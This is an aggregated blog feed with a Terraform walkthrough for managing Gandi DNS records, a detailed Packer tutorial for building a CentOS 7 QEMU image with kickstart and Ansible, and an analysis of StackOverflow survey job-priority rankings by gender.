  description = "The domain name of the zone"
  default     = "example.com"
}

variable "TTL" {
  description = "The default TTL of zone & records"
  default     = "3600"
}

variable "github" {
  description = "Setting up an apex domain on Microsoft GitHub"
  type        = "list"
  default     = [
    "185.199.108.153",
    "185.199.109.153",
    "185.199.110.153",
    "185.199.111.153"
  ]
}

main.tf

# Gandi
provider "gandi" {
  key = "${var.gandi_api_token}"
}

# Zone
resource "gandi_zone" "domain_tld" {
  name = "${var.domain} Zone"
}

# Domain is always attached to a zone
resource "gandi_domainattachment" "domain_tld" {
  domain = "${var.domain}"
  zone   = "${gandi_zone.domain_tld.id}"
}

# DNS Records

resource "gandi_zonerecord" "mx" {
  zone   = "${gandi_zone.domain_tld.id}"
  name   = "@"
  type   = "MX"
  ttl    = "${var.TTL}"
  values = [ "10 example.com." ]
}

resource "gandi_zonerecord" "web" {
  zone   = "${gandi_zone.domain_tld.id}"
  name   = "web"
  type   = "CNAME"
  ttl    = "${var.TTL}"
  values = [ "test.example.com." ]
}

resource "gandi_zonerecord" "www" {
  zone   = "${gandi_zone.domain_tld.id}"
  name   = "www"
  type   = "CNAME"
  ttl    = "${var.TTL}"
  values = [ "${var.domain}." ]
}

resource "gandi_zonerecord" "origin" {
  zone   = "${gandi_zone.domain_tld.id}"
  name   = "@"
  type   = "A"
  ttl    = "${var.TTL}"
  values = [ "${var.github}" ]
}


### Variables

By declaring these variables, in vars.tf, we can use them in main.tf.

• gandi_api_token - The Gandi API Token
• domain - The Domain Name of the zone
• TTL - The default TimeToLive for the zone and records
• github - This is a list of IPs that we want to use for our site.

### Main

Our zone should have four DNS record types. The gandi_zonerecord is the terraform resource and the second part is our local identifier. Though it may not be obvious at first, the last record, named “origin”, will contain all four IPs from github.

• gandi_zonerecord "mx"
• gandi_zonerecord "web"
• gandi_zonerecord "www"
• gandi_zonerecord "origin"

## Zone

In other (dns) words, the state of our zone should be:

example.com.        3600    IN    MX       10 example.com.
web.example.com.    3600    IN    CNAME    test.example.com.
www.example.com.    3600    IN    CNAME    example.com.
example.com.        3600    IN    A        185.199.108.153
example.com.        3600    IN    A        185.199.109.153
example.com.        3600    IN    A        185.199.110.153
example.com.        3600    IN    A        185.199.111.153

## Environment

We haven’t yet declared the gandi api token anywhere in our files. This is by design: it is not safe to write the token in the files (let’s assume that these files are on a public git repository).

So instead, we can either type it on the command line as we run terraform to create, change or delete our dns infra, or we can pass it through an environment variable.

export TF_VAR_gandi_api_token="XXXXXXXX"

## Verbose Logging

I prefer to have debug on, and appending all messages to a log file:

export TF_LOG="DEBUG"
export TF_LOG_PATH=./terraform.log

## Initialize

terraform init

the output should be:

Initializing provider plugins...

Terraform has been successfully initialized!

You may now begin working with Terraform. Try running "terraform plan" to see
any changes that are required for your infrastructure. All Terraform commands
should now work.

If you ever set or change modules or backend configuration for Terraform,
rerun this command to reinitialize your working directory. If you forget, other
commands will detect it and remind you to do so if necessary.


## Planning

Next thing, we have to plan!

terraform plan

First line is:

Refreshing Terraform state in-memory prior to plan...

the rest should be:

An execution plan has been generated and is shown below.
Resource actions are indicated with the following symbols:
+ create

Terraform will perform the following actions:

+ gandi_domainattachment.domain_tld
id:                <computed>
domain:            "example.com"
zone:              "${gandi_zone.domain_tld.id}"

+ gandi_zone.domain_tld
id:                <computed>
name:              "example.com Zone"

+ gandi_zonerecord.mx
id:                <computed>
name:              "@"
ttl:               "3600"
type:              "MX"
values.#:          "1"
values.3522983148: "10 example.com."
zone:              "${gandi_zone.domain_tld.id}"

+ gandi_zonerecord.origin
id:                <computed>
name:              "@"
ttl:               "3600"
type:              "A"
values.#:          "4"
values.1201759686: "185.199.109.153"
values.226880543:  "185.199.111.153"
values.2365437539: "185.199.108.153"
values.3336126394: "185.199.110.153"
zone:              "${gandi_zone.domain_tld.id}"

+ gandi_zonerecord.web
id:                <computed>
name:              "web"
ttl:               "3600"
type:              "CNAME"
values.#:          "1"
values.921960212:  "test.example.com."
zone:              "${gandi_zone.domain_tld.id}"

+ gandi_zonerecord.www
id:                <computed>
name:              "www"
ttl:               "3600"
type:              "CNAME"
values.#:          "1"
values.3477242478: "example.com."
zone:              "${gandi_zone.domain_tld.id}"

Plan: 6 to add, 0 to change, 0 to destroy.

so the plan is Plan: 6 to add!

## State

Let’s get back to this msg:

Refreshing Terraform state in-memory prior to plan...

Terraform is telling us that it is refreshing the state. What does this mean?

Terraform is declarative. That means terraform is only interested in implementing our plan, but it needs to know the previous state of our infrastructure. So it will create only new records, update (if needed) existing records, or even delete deprecated records. Either way, it needs to know the current state of our dns infra (zone/records).

Terraforming (as the definition of the word) is the process of deliberately modifying the current state of our infrastructure.

## Import

So we need to get the current state into a local state file and re-plan our terraformation.

$ terraform import gandi_domainattachment.domain_tld example.com
gandi_domainattachment.domain_tld: Importing from ID "example.com"...
gandi_domainattachment.domain_tld: Import complete!
Imported gandi_domainattachment (ID: example.com)
gandi_domainattachment.domain_tld: Refreshing state... (ID: example.com)

Import successful!

The resources that were imported are shown above. These resources are now in
your Terraform state and will henceforth be managed by Terraform.

### How does import work?

The current state of our domain (zone & records) has specific identifiers on the Gandi side. We need to map our local IDs to the remote ones, and that information updates the terraform state.

So the previous import command has three parts:

Gandi Resource        .Local ID    Remote ID
gandi_domainattachment.domain_tld  example.com

### Terraform State

The successful import of the domain attachment, creates a local terraform state file terraform.tfstate:

$ cat terraform.tfstate
{
    "version": 3,
    "terraform_version": "0.11.7",
    "serial": 1,
    "lineage": "dee62659-8920-73d7-03f5-779e7a477011",
    "modules": [
        {
            "path": [
                "root"
            ],
            "outputs": {},
            "resources": {
                "gandi_domainattachment.domain_tld": {
                    "type": "gandi_domainattachment",
                    "depends_on": [],
                    "primary": {
                        "id": "example.com",
                        "attributes": {
                            "domain": "example.com",
                            "id": "example.com",
                            "zone": "XXXXXXXX-6bd2-11e8-XXXX-00163ee24379"
                        },
                        "meta": {},
                        "tainted": false
                    },
                    "deposed": [],
                    "provider": "provider.gandi"
                }
            },
            "depends_on": []
        }
    ]
}

### Import All Resources

Reading through the state file, we see that our zone also has an ID:

"zone": "XXXXXXXX-6bd2-11e8-XXXX-00163ee24379"

We should use this ID to import all resources.

#### Zone Resource

Import the gandi zone resource:

terraform import gandi_zone.domain_tld XXXXXXXX-6bd2-11e8-XXXX-00163ee24379

#### DNS Records

As we can see above in the DNS section, we have four (4) dns records, and when importing resources we need to add their path after the ID, eg. for MX it is /@/MX, for web it is /web/CNAME, etc.

terraform import gandi_zonerecord.mx XXXXXXXX-6bd2-11e8-XXXX-00163ee24379/@/MX
terraform import gandi_zonerecord.web XXXXXXXX-6bd2-11e8-XXXX-00163ee24379/web/CNAME
terraform import gandi_zonerecord.www XXXXXXXX-6bd2-11e8-XXXX-00163ee24379/www/CNAME
terraform import gandi_zonerecord.origin XXXXXXXX-6bd2-11e8-XXXX-00163ee24379/@/A

## Re-Planning

Okay, we have imported our dns infra state to a local file. Time to plan once more:

$ terraform plan

Plan: 2 to add, 1 to change, 0 to destroy.

## Save Planning

We can save our plan:

$ terraform plan -out terraform.tfplan

## Apply aka run our plan

We can now apply our plan to our dns infra, the gandi provider.

$ terraform apply
Do you want to perform these actions?
Terraform will perform the actions described above.
Only 'yes' will be accepted to approve.

Enter a value: 

To Continue, we need to type: yes

### Non Interactive

or we can use our already saved plan to run without asking:

$ terraform apply "terraform.tfplan"
gandi_zone.domain_tld: Modifying... (ID: XXXXXXXX-6bd2-11e8-XXXX-00163ee24379)
  name: "example.com zone" => "example.com Zone"
gandi_zone.domain_tld: Modifications complete after 2s (ID: XXXXXXXX-6bd2-11e8-XXXX-00163ee24379)
gandi_domainattachment.domain_tld: Creating...
  domain: "" => "example.com"
  zone:   "" => "XXXXXXXX-6bd2-11e8-XXXX-00163ee24379"
gandi_zonerecord.www: Creating...
  name:              "" => "www"
  ttl:               "" => "3600"
  type:              "" => "CNAME"
  values.#:          "" => "1"
  values.3477242478: "" => "example.com."
  zone:              "" => "XXXXXXXX-6bd2-11e8-XXXX-00163ee24379"
gandi_domainattachment.domain_tld: Creation complete after 0s (ID: example.com)
gandi_zonerecord.www: Creation complete after 1s (ID: XXXXXXXX-6bd2-11e8-XXXX-00163ee24379/www/CNAME)

Apply complete! Resources: 2 added, 1 changed, 0 destroyed.

Tag(s): terraform, gandi

## June 08, 2018

### Evaggelos Balaskas

#### Packer by HashiCorp

Packer is an open source tool for creating identical machine images for multiple platforms from a single source configuration.

## Installation

in archlinux the package name is: packer-io

sudo pacman -S community/packer-io
sudo ln -s /usr/bin/packer-io /usr/local/bin/packer

on any generic 64bit linux:

$ curl -sLO https://releases.hashicorp.com/packer/1.2.4/packer_1.2.4_linux_amd64.zip

$ unzip packer_1.2.4_linux_amd64.zip
$ chmod +x packer
$ sudo mv packer /usr/local/bin/packer

### Version

$ packer -v
1.2.4

or

$ packer --version
1.2.4

or

$ packer version
Packer v1.2.4

or

$ packer -machine-readable version
1528019302,,version,1.2.4
1528019302,,version-prelease,
1528019302,,version-commit,e3b615e2a+CHANGES
1528019302,,ui,say,Packer v1.2.4

### Help

$ packer --help
Usage: packer [--version] [--help] <command> [<args>]

Available commands are:
build       build image(s) from template
fix         fixes templates from old versions of packer
inspect     see components of a template
push        push a template and supporting files to a Packer build service
validate    check that a template is valid
version     Prints the Packer version

$ packer --help validate

Usage: packer validate [options] TEMPLATE

  Checks the template is valid by parsing the template and also
  checking the configuration with the various builders, provisioners, etc.

  If it is not valid, the errors will be shown and the command will exit
  with a non-zero exit status. If it is valid, it will exit with a zero
  exit status.

Options:

  -syntax-only           Only check syntax. Do not verify config of the template.
  -except=foo,bar,baz    Validate all builds other than these
  -only=foo,bar,baz      Validate only these builds
  -var 'key=value'       Variable for templates, can be used multiple times.
  -var-file=path         JSON file containing user variables.

#### Help Inspect

Usage: packer inspect TEMPLATE

  Inspects a template, parsing and outputting the components a template
  defines. This does not validate the contents of a template (other than
  basic syntax by necessity).

Options:

  -machine-readable  Machine-readable output

#### Help Build

$ packer --help build

Usage: packer build [options] TEMPLATE

Will execute multiple builds in parallel as defined in the template.
The various artifacts created by the template will be outputted.

Options:

-color=false               Disable color output (on by default)
-debug                     Debug mode enabled for builds
-except=foo,bar,baz        Build all builds other than these
-only=foo,bar,baz          Build only the specified builds
-force                     Force a build to continue if artifacts exist, deletes existing artifacts
-on-error=[cleanup|abort|ask] If the build fails do: clean up (default), abort, or ask
-parallel=false            Disable parallelization (on by default)
-var 'key=value'           Variable for templates, can be used multiple times.
-var-file=path             JSON file containing user variables.

## Autocompletion

To enable autocompletion

$ packer -autocomplete-install

## Workflow

.. and terminology.

Packer uses Templates, which are json files that carry the configuration for the various tasks. The core task is the Build. In this stage, Packer uses the Builders to create a machine image for a single platform, eg. the Qemu Builder to create a kvm/xen virtual machine image.

The next stage is provisioning. In this task, Provisioners (like ansible or shell scripts) perform tasks inside the machine image.

When finished, Post-processors handle the final tasks, such as compressing the virtual image or importing it into a specific provider.

## Template

a json template file contains:

• builders (required)
• description (optional)
• variables (optional)
• min_packer_version (optional)
• provisioners (optional)
• post-processors (optional)

also comments are supported, but only as root level keys

eg.

{
  "_comment": "This is a comment",
  "builders": [
    {}
  ]
}

### Template Example

eg. Qemu Builder

qemu_example.json

{
  "_comment": "This is a qemu builder example",
  "builders": [
    {
      "type": "qemu"
    }
  ]
}

## Validate

### Syntax Only

$ packer validate -syntax-only qemu_example.json
Syntax-only check passed. Everything looks okay.

## Variables

### user variables

It is really simple to use variables inside the packer template:

"variables": {
  "centos_version": "7.5"
},

and use the variable as:

"{{user `centos_version`}}",
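Putting the declaration and the reference together, a minimal template sketch might look like this (the iso_url path is a made-up illustration, and a real build would also need a checksum):

```json
{
  "variables": {
    "centos_version": "7.5"
  },
  "builders": [
    {
      "type": "qemu",
      "iso_url": "/home/ebal/Downloads/CentOS-7-x86_64-Minimal-{{user `centos_version`}}.iso",
      "communicator": "none"
    }
  ]
}
```

Note the backticks around the variable name inside the {{user ...}} call; packer validate will complain without them.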

## Description

We can add on top of our template a description declaration:

eg.

"description": "\tMinimal CentOS 7 Qemu Image\n__________________________________________",

and verify it when inspecting the template.

## QEMU Builder

The full documentation on QEMU Builder, can be found here

### Qemu template example

Try to keep things simple. Here is an example setup for building a CentOS 7.5 image with packer via qemu.

$ cat qemu_example.json
{
  "_comment": "This is a CentOS 7.5 Qemu Builder example",
  "description": "\tMinimal CentOS 7 Qemu Image\n__________________________________________",
  "variables": {
    "7.5": "1804",
    "checksum": "714acc0aefb32b7d51b515e25546835e55a90da9fb00417fbee2d03a62801efd"
  },
  "builders": [
    {
      "type": "qemu",
      "iso_url": "http://ftp.otenet.gr/linux/centos/7/isos/x86_64/CentOS-7-x86_64-Minimal-{{user `7.5`}}.iso",
      "iso_checksum": "{{user `checksum`}}",
      "iso_checksum_type": "sha256",
      "communicator": "none"
    }
  ]
}

### Communicator

There are three basic communicators:

• none
• Secure Shell (SSH)
• WinRM

that are configured within the builder section.

Communicators are used in the provisioning section for uploading files or executing scripts. In case of not using any provisioning, choosing none instead of the default ssh disables that feature.

"communicator": "none"

#### iso_url

can be an http url or a file path to a file. It is useful, when starting to work with packer, to have the ISO file local, so it doesn't try to download it from the internet on every trial and error step.

eg.

"iso_url": "/home/ebal/Downloads/CentOS-7-x86_64-Minimal-{{user `7.5`}}.iso"

#### Inspect Template

$ packer inspect qemu_example.json
Description:

Minimal CentOS 7 Qemu Image
__________________________________________

Optional variables and their defaults:

7.5      = 1804
checksum = 714acc0aefb32b7d51b515e25546835e55a90da9fb00417fbee2d03a62801efd

Builders:

qemu

Provisioners:

<No provisioners>

Note: If your build names contain user variables or template
functions such as 'timestamp', these are processed at build time,
and therefore only show in their raw form here.

$ packer validate -syntax-only qemu_example.json
Syntax-only check passed. Everything looks okay.

#### Validate

$ packer validate qemu_example.json
Template validated successfully.

### Build

Initial Build

$packer build qemu_example.json #### Build output the first packer output should be like this: qemu output will be in this color. ==> qemu: Downloading or copying ISO qemu: Downloading or copying: file:///home/ebal/Downloads/CentOS-7-x86_64-Minimal-1804.iso ==> qemu: Creating hard drive... ==> qemu: Looking for available port between 5900 and 6000 on 127.0.0.1 ==> qemu: Starting VM, booting from CD-ROM ==> qemu: Waiting 10s for boot... ==> qemu: Connecting to VM via VNC ==> qemu: Typing the boot command over VNC... ==> qemu: Waiting for shutdown... ==> qemu: Converting hard drive... Build 'qemu' finished. Use ctrl+c to break and exit the packer build. ## Automated Installation The ideal scenario is to automate the entire process, using a Kickstart file to describe the initial CentOS installation. The kickstart reference guide can be found here. In this example, this ks file CentOS7-ks.cfg can be used. In the jason template file, add the below configuration:  "boot_command":[ "<tab> text ", "ks=https://raw.githubusercontent.com/ebal/confs/master/Kickstart/CentOS7-ks.cfg ", "nameserver=9.9.9.9 ", "<enter><wait> " ], "boot_wait": "0s" That tells packer not to wait for user input and instead use the specific ks file. ### http_directory It is possible to retrieve the kickstast file from an internal HTTP server that packer can create, when building an image in an environment without internet access. Enable this feature by declaring a directory path: http_directory Path to a directory to serve using an HTTP server. The files in this directory will be available over HTTP that will be requestable from the virtual machine eg.  
  "http_directory": "/home/ebal/Downloads/",
  "http_port_min": "8090",
  "http_port_max": "8100",

With that, the previous boot command should be written as:

  "boot_command":[
    "<tab> text ",
    "ks=http://{{ .HTTPIP }}:{{ .HTTPPort }}/CentOS7-ks.cfg ",
    "<enter><wait>"
  ],
  "boot_wait": "0s"

## Timeout

A “well known” error with packer is the Waiting for shutdown timeout error, eg.

==> qemu: Waiting for shutdown...
==> qemu: Failed to shutdown
==> qemu: Deleting output directory...
Build 'qemu' errored: Failed to shutdown

==> Some builds didn't complete successfully and had errors:
--> qemu: Failed to shutdown

To bypass this error, change shutdown_timeout to something greater than the default value of 5m (five minutes), eg.

  "shutdown_timeout": "30m"

### ssh

Sometimes the timeout error occurs on the ssh attempts. If you are using ssh as the communicator, also change the below value:

  "ssh_timeout": "30m",

## qemu_example.json

This is a working template file:

{
  "_comment": "This is a CentOS 7.5 Qemu Builder example",
  "description": "\tMinimal CentOS 7 Qemu Image\n__________________________________________",
  "variables": {
    "7.5": "1804",
    "checksum": "714acc0aefb32b7d51b515e25546835e55a90da9fb00417fbee2d03a62801efd"
  },
  "builders": [
    {
      "type": "qemu",
      "iso_url": "/home/ebal/Downloads/CentOS-7-x86_64-Minimal-{{user `7.5`}}.iso",
      "iso_checksum": "{{user `checksum`}}",
      "iso_checksum_type": "sha256",
      "communicator": "none",
      "boot_command":[
        "<tab> text ",
        "ks=http://{{ .HTTPIP }}:{{ .HTTPPort }}/CentOS7-ks.cfg ",
        "nameserver=9.9.9.9 ",
        "<enter><wait> "
      ],
      "boot_wait": "0s",
      "http_directory": "/home/ebal/Downloads/",
      "http_port_min": "8090",
      "http_port_max": "8100",
      "shutdown_timeout": "20m"
    }
  ]
}

#### build

packer build qemu_example.json

#### Verify

When the installation is finished, check the output folder & image:

$ ls
output-qemu  packer_cache  qemu_example.json

$ ls output-qemu/
packer-qemu

$ file output-qemu/packer-qemu
output-qemu/packer-qemu: QEMU QCOW Image (v3), 42949672960 bytes

$ du -sh output-qemu/packer-qemu
1.7G    output-qemu/packer-qemu

$ qemu-img info packer-qemu
image: packer-qemu
file format: qcow2
virtual size: 40G (42949672960 bytes)
disk size: 1.7G
cluster_size: 65536
Format specific information:
compat: 1.1
lazy refcounts: false
refcount bits: 16
corrupt: false
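The template above pins the installation ISO with a sha256 iso_checksum. You can compute (and sanity-check) that value yourself before a build; a minimal Python sketch (an illustration, not part of packer), reading the file in chunks so a large ISO doesn't need to fit in memory:

```python
import hashlib

def sha256_of(path, chunk_size=1 << 20):
    """Compute the sha256 hex digest of a file, chunk by chunk."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()

# e.g. compare against the "checksum" variable in qemu_example.json:
# sha256_of("/home/ebal/Downloads/CentOS-7-x86_64-Minimal-1804.iso")
```

If the digest doesn't match the template's checksum variable, packer will refuse the ISO, so checking up front saves a failed build.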

### KVM

The default qemu/kvm builder will run something like this:

/usr/bin/qemu-system-x86_64
-name packer-qemu -display sdl
-netdev user,id=user.0
-vnc 127.0.0.1:32
-machine type=pc,accel=kvm
-device virtio-net,netdev=user.0
-boot once=d
-m 512M

In the builder section those qemu/kvm settings can be changed.

Using variables:

eg.

  "virtual_name": "centos7min.qcow2",
  "virtual_dir":  "centos7",
  "virtual_size": "20480",
  "virtual_mem":  "4096M"

In Qemu Builder:

  "accelerator": "kvm",
  "disk_size":   "{{ user `virtual_size` }}",
  "format":      "qcow2",
  "qemuargs":[
    [ "-m", "{{ user `virtual_mem` }}" ]
  ],

  "vm_name":          "{{ user `virtual_name` }}",
  "output_directory": "{{ user `virtual_dir` }}"

There is no need for packer to use a display. This is really useful when running packer on a remote machine. The automated installation can be run headless without any interaction, although there is a way to connect through vnc and watch the process.

"headless": true

#### Serial

When running a headless installation, perhaps over a command-line interface on a remote machine, VNC isn't of much practical use. Instead, there is a way to use the serial output of qemu. To do that, you must pass some extra qemu arguments:

eg.

  "qemuargs":[
    [ "-m",      "{{ user `virtual_mem` }}" ],
    [ "-serial", "file:serial.out" ]
  ],

and also pass an extra (kernel) argument console=ttyS0,115200n8 to the boot command:

  "boot_command":[
    "<tab> text ",
    "console=ttyS0,115200n8 ",
    "ks=http://{{ .HTTPIP }}:{{ .HTTPPort }}/CentOS7-ks.cfg ",
    "nameserver=9.9.9.9 ",
    "<enter><wait> "
  ],
  "boot_wait": "0s",

To see the serial output:

$ tail -f serial.out

## Post-Processors

When the machine image is finished, Packer can run tasks such as compressing the image or importing it to a cloud provider. The simplest way to get familiar with post-processors is to use compress:

  "post-processors":[
    {
      "type":   "compress",
      "format": "lz4",
      "output": "{{.BuildName}}.lz4"
    }
  ]

### output

So here is the output:

$ packer build qemu_example.json
qemu output will be in this color.

==> qemu: Creating hard drive...
==> qemu: Starting HTTP server on port 8099
==> qemu: Looking for available port between 5900 and 6000 on 127.0.0.1
==> qemu: Starting VM, booting from CD-ROM
qemu: The VM will be run headless, without a GUI. If you want to
qemu: view the screen of the VM, connect via VNC without a password to
qemu: vnc://127.0.0.1:5982
==> qemu: Overriding defaults Qemu arguments with QemuArgs...
==> qemu: Connecting to VM via VNC
==> qemu: Typing the boot command over VNC...
==> qemu: Waiting for shutdown...
==> qemu: Converting hard drive...
==> qemu: Running post-processor: compress
==> qemu (compress): Using lz4 compression with 4 cores for qemu.lz4
==> qemu (compress): Archiving centos7/centos7min.qcow2 with lz4
==> qemu (compress): Archive qemu.lz4 completed
Build 'qemu' finished.

==> Builds finished. The artifacts of successful builds are:
--> qemu: compressed artifacts in: qemu.lz4

### info

After archiving the centos7min image, the output_directory and the original qemu image are deleted.

$ qemu-img info ./centos7/centos7min.qcow2
image: ./centos7/centos7min.qcow2
file format: qcow2
virtual size: 20G (21474836480 bytes)
disk size: 1.5G
cluster_size: 65536
Format specific information:
    compat: 1.1
    lazy refcounts: false
    refcount bits: 16
    corrupt: false

$ du -h qemu.lz4
992M    qemu.lz4

## Provisioners

Last but surely not least, packer supports Provisioners.
Provisioners are commonly used for:

• installing packages
• patching the kernel
• creating users

and can be local shell scripts or more advanced tools like Ansible, Puppet, Chef, or even PowerShell.

### Ansible

So here is an ansible example:

$ tree testrole
testrole
├── defaults
│   └── main.yml
├── files
│   └── main.yml
├── handlers
│   └── main.yml
├── meta
│   └── main.yml
├── tasks
│   └── main.yml
├── templates
│   └── main.yml
└── vars
    └── main.yml

7 directories, 7 files

$ cat testrole/tasks/main.yml
---
- name: Debug that our ansible role is working
  debug:
    msg: "It Works !"

- name: Install the Extra Packages for Enterprise Linux repository
  yum:
    name: epel-release
    state: present

- name: upgrade all packages
  yum:
    name: '*'
    state: latest
So this Ansible role will install the EPEL repository and upgrade all packages in our image.

### template


  "variables":{
    "playbook_name": "testrole.yml"
  },

  ...

  "provisioners":[
    {
      "type":          "ansible",
      "playbook_file": "{{ user `playbook_name` }}"
    }
  ],

### Communicator

Ansible needs to ssh into this machine to provision it. It is time to change the communicator from none to ssh.

  "communicator": "ssh",
  "ssh_username": "root",
  "ssh_timeout":  "3600s",
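Timeout values such as 3600s or 30m are Go-style duration strings (Packer is written in Go). A hedged Python sketch of how such values map to seconds — an illustration only, not Packer's actual parser, and duration_to_seconds is a hypothetical helper name:

```python
import re

# Go-style duration units, as used by settings like
# shutdown_timeout ("30m") and ssh_timeout ("3600s")
UNITS = {"s": 1, "m": 60, "h": 3600}

def duration_to_seconds(value: str) -> int:
    """Convert a duration string like '30m' or '1h30m' to seconds."""
    parts = re.findall(r"(\d+)([smh])", value)
    # Reject strings with leftover characters, e.g. "30x"
    if not parts or "".join(n + u for n, u in parts) != value:
        raise ValueError("unrecognized duration: %r" % value)
    return sum(int(n) * UNITS[u] for n, u in parts)
```

So "30m" and "1800s" describe the same timeout; pick whichever reads better in the template.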

### output

$ packer build qemu_example.json

qemu output will be in this color.

==> qemu: Downloading or copying ISO
    qemu: Downloading or copying: file:///home/ebal/Downloads/CentOS-7-x86_64-Minimal-1804.iso
==> qemu: Creating hard drive...
==> qemu: Starting HTTP server on port 8100
==> qemu: Found port for communicator (SSH, WinRM, etc): 4105.
==> qemu: Looking for available port between 5900 and 6000 on 127.0.0.1
==> qemu: Starting VM, booting from CD-ROM
    qemu: The VM will be run headless, without a GUI. If you want to
    qemu: view the screen of the VM, connect via VNC without a password to
    qemu: vnc://127.0.0.1:5990
==> qemu: Overriding defaults Qemu arguments with QemuArgs...
==> qemu: Connecting to VM via VNC
==> qemu: Typing the boot command over VNC...
==> qemu: Waiting for SSH to become available...
==> qemu: Connected to SSH!
==> qemu: Provisioning with Ansible...
==> qemu: Executing Ansible: ansible-playbook --extra-vars packer_build_name=qemu packer_builder_type=qemu -i /tmp/packer-provisioner-ansible594660041 /opt/hashicorp/packer/testrole.yml -e ansible_ssh_private_key_file=/tmp/ansible-key802434194
    qemu:
    qemu: PLAY [all] *********************************************************************
    qemu:
    qemu: TASK [testrole : Debug that our ansible role is working] ***********************
    qemu: ok: [default] => {
    qemu:     "msg": "It Works !"
    qemu: }
    qemu:
    qemu: TASK [testrole : Install the Extra Packages for Enterprise Linux repository] ***
    qemu: changed: [default]
    qemu:
    qemu: TASK [testrole : upgrade all packages] *****************************************
    qemu: changed: [default]
    qemu:
    qemu: PLAY RECAP *********************************************************************
    qemu: default : ok=3 changed=2 unreachable=0 failed=0
    qemu:
==> qemu: Halting the virtual machine...
==> qemu: Converting hard drive...
==> qemu: Running post-processor: compress
==> qemu (compress): Using lz4 compression with 4 cores for qemu.lz4
==> qemu (compress): Archiving centos7/centos7min.qcow2 with lz4
==> qemu (compress): Archive qemu.lz4 completed
Build 'qemu' finished.

==> Builds finished. The artifacts of successful builds are:
--> qemu: compressed artifacts in: qemu.lz4

## Appendix

Here is the entire qemu template file:

### qemu_example.json

{
  "_comment": "This is a CentOS 7.5 Qemu Builder example",
  "description": "\tMinimal CentOS 7 Qemu Image\n__________________________________________",
  "variables": {
    "7.5": "1804",
    "checksum": "714acc0aefb32b7d51b515e25546835e55a90da9fb00417fbee2d03a62801efd",
    "virtual_name": "centos7min.qcow2",
    "virtual_dir": "centos7",
    "virtual_size": "20480",
    "virtual_mem": "4096M",
    "Password": "password",
    "ansible_playbook": "testrole.yml"
  },
  "builders": [
    {
      "type": "qemu",
      "headless": true,
      "iso_url": "/home/ebal/Downloads/CentOS-7-x86_64-Minimal-{{user `7.5`}}.iso",
      "iso_checksum": "{{user `checksum`}}",
      "iso_checksum_type": "sha256",
      "communicator": "ssh",
      "ssh_username": "root",
      "ssh_password": "{{user `Password`}}",
      "ssh_timeout": "3600s",
      "boot_command":[
        "<tab> text ",
        "console=ttyS0,115200n8 ",
        "ks=http://{{ .HTTPIP }}:{{ .HTTPPort }}/CentOS7-ks.cfg ",
        "nameserver=9.9.9.9 ",
        "<enter><wait> "
      ],
      "boot_wait": "0s",
      "http_directory": "/home/ebal/Downloads/",
      "http_port_min": "8090",
      "http_port_max": "8100",
      "shutdown_timeout": "30m",
      "accelerator": "kvm",
      "disk_size": "{{ user `virtual_size` }}",
      "format": "qcow2",
      "qemuargs":[
        [ "-m", "{{ user `virtual_mem` }}" ],
        [ "-serial", "file:serial.out" ]
      ],
      "vm_name": "{{ user `virtual_name` }}",
      "output_directory": "{{ user `virtual_dir` }}"
    }
  ],
  "provisioners":[
    {
      "type": "ansible",
      "playbook_file": "{{ user `ansible_playbook` }}"
    }
  ],
  "post-processors":[
    {
      "type": "compress",
      "format": "lz4",
      "output": "{{.BuildName}}.lz4"
    }
  ]
}

Tag(s): packer, ansible, qemu

## June 04, 2018

### SysAdmin1138

#### Retargeting the StackOverflow survey

The core of the critique is that they had a nice trove of data useful for recruiters and didn't do anything useful with it. Their "rank these aspects of a potential job opportunity from least to most important" question is the big one, and their official analysis just reports most-desired/least-desired. Since pay is one of the options, pay was the most desired thing. My proposal is that the number two and three most popular things are actually quite useful, as those are what allow a company that can't compete directly on pay to get in front of people.

StackOverflow recently released the full survey data, allowing me to answer my own questions. There is some very good data they could have presented, but chose not to.

First of all, the number one, two and three priorities are the ones that people are most conscious of, and may be willing to compromise on one to get the other two. This should have been presented:

1. All respondents' top-3 ranked.
2. All men's top-3 ranked.
3. All women's top-3 ranked.
4. All non-binary top-3 ranked.

Because men were 92% of all respondents, I'm not going to bother looking at the all-respondents number, since the men-top-3 would look nigh identical.

Here is the top-3 chart for things men look for in a job opportunity:

1. Pay/Benefits -- Pay me what I want
2. Language/Framework -- in the languages I want
3. Professional development -- and help me get better at it.

With Office Environment and Culture as a close number 4. Yes, the squishy SJW-like "office culture" made a high ranking with men.

The chart for women was a bit different, which is useful if you're targeting for diversity. This chart shows four items at about the same prevalence in the top three:

• Office Environment and Culture
• Pay/Benefits
• Professional Development
• Framework/Language

The absolute rankings are a bit different, with Office Environment leading ahead of pay.
The shape of this chart tells me that women value a healthy office environment and an employer willing to invest in their employees. Men value this as well, but not as much as they value money and what they'll be working on.

However, the StackOverflow survey had more genders than just Man/Woman. They tracked two more categories. How did the Transgender and Gender-Nonconforming/Genderqueer/Non-Binary populations compare? These are groups who typically are the diversity in their departments. How does that affect preferences when assessing a job?

While these populations are rather smaller than the other two, a clear trend emerges. Both populations value Office Environment and Culture well above anything else. Both populations also rank Diversity very highly. The GNC/GQ/NB set values that above pay/benefits. This suggests that people in this set are willing to sacrifice pay to work someplace they'll be accepted into.

Looking at the ranked-in-top-3 charts has proven useful for recruitment, far more than simply looking at the top-ranked items:

• Men and women look for the same things: pay, tech they'll be working with, professional development, and office-environment.
• Women are more interested in professional development and office environment than men, which gives you hints about how to craft your postings to draw in more women.
• Transgender and GNC/GQ/NB applicants replace professional development with diversity in what they look for. This also gives you hints about how to craft your postings to draw more of these applicants.
• If you can't compete on pay, you can still compete on the other three points.

They also asked about assessing company benefits. That ended up a less interesting analysis, as there was little variation between the genders. Here is the chart for Women.

The rankings held true across all four genders, with some variation in the number 4 and 5 spots:

1. Pay/Bonus
2. Health insurance
3. Retirement/pension matching.
4. Conference/Education Budget
5. Computer/Office equipment allowance.

Men had a tie between Stock Options and Computer/Office equipment allowance, with Conference/Education Budget as the next-highest. Transgender respondents preferred Computer/Office equipment allowance over Conference/Education Budget. The GNC/GQ/NB respondents matched the women in preferences.

Even so, there are some suggestions here for recruiting departments to tailor their messaging regarding company benefits:

• Pay is king, which we all know already.
• Healthcare is second. If your company is doing anything special here, like covering employee copays/deductibles, definitely mention it.
• 401k and other retirement matching is a worthwhile differentiator.
• If you have a 401k/403b match, mention it in the job-posting every time.
• I need to see what the age-based rankings are for this one. I suspect that senior engineers, who are likely older, consider this one more important than juniors.
